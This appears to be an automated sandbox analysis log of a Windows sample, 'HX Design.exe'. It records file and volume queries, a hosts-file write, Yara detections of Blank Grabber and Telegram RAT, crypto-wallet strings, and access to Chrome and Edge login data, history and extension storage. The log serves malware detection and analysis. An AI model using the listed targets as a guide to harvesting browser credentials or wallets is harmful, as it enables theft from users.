Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\972aKp3s1E.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\psFKbeV1FJ.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\e4WZCaJlqR.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 0_2_00007FF73206D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF73206D010

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 0_2_00007FF732085C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF732085C00

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D2348CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

73_2_00007FF77D2348CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\HX Design.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HX Design.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: HX Design.exe PID: 7524, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fJaxx
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\961544c3-32b7-44ce-8bdb-c185972bc33e	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
